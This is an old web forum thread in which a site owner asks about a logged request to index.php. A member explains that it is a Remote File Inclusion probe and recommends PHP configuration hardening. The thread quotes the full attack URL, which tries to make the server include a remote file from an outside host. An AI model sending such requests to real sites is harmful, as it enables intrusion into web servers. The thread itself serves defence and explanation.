Author Topic: lansites.ru/language/lang_english/test.txt ??  (Read 16439 times)

0 Members and 1 Guest are viewing this topic.

November 10, 2008, 10:55:36 pm
Read 16439 times

sLaV

  • Newbie

  • Offline
  • *

  • 2
Hi,

Looking through our server logs we noticed somebody tried viewing the following page on our site:
/index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://lansites.ru//language/lang_english/test.txt???

I cant seem to find any info on this test.txt file anywhere I just noticed it in your malware domain list ... I checked our server and there are no new files injected on our site that I can see ... checked the index.php file and no script has been injected ... have no idea what their trying to do here ... anybody have any further info on this?? Should we be worried??


Cheers

November 10, 2008, 11:22:28 pm
Reply #1

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
hi sLaV,
what you see in your logs is an attempt of RFI (Remote File Inclusion: http://en.wikipedia.org/wiki/Remote_File_Inclusion). That means someone is just probing your web-application for a possible vulnerability. This does not mean you are vulnerable!
All this script does is check whether RFI is possible for this script and the safe_mode setting in your php configuration  is enabled/disabled.

no need to worry :)

regards,
philipp

November 10, 2008, 11:33:47 pm
Reply #2

sLaV

  • Newbie

  • Offline
  • *

  • 2
Hi philipp,

Thank you kindly for getting back to us so quickly ... I checked our server info and it looks like safe mode is turned off, register_globals is on and allow_url_fopen is on ... should we be contacting our host to change any of these settings? I just dont know what their capable of from here ...


Cheers

November 10, 2008, 11:47:42 pm
Reply #3

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
sLaV,
it all depends on your web-applications' requirements. as long as those are secure you wont have to worry.
ideally, these settings should be set to
safe_mode on
register_globals off
allow_url_fopen off

but as stated above, it all depends on how secure your php code is and what it depends/relies on. also, some of those settings can also be changed in local .htaccess files afaik.
read more here:
http://www.owasp.org/index.php/PHP_Top_5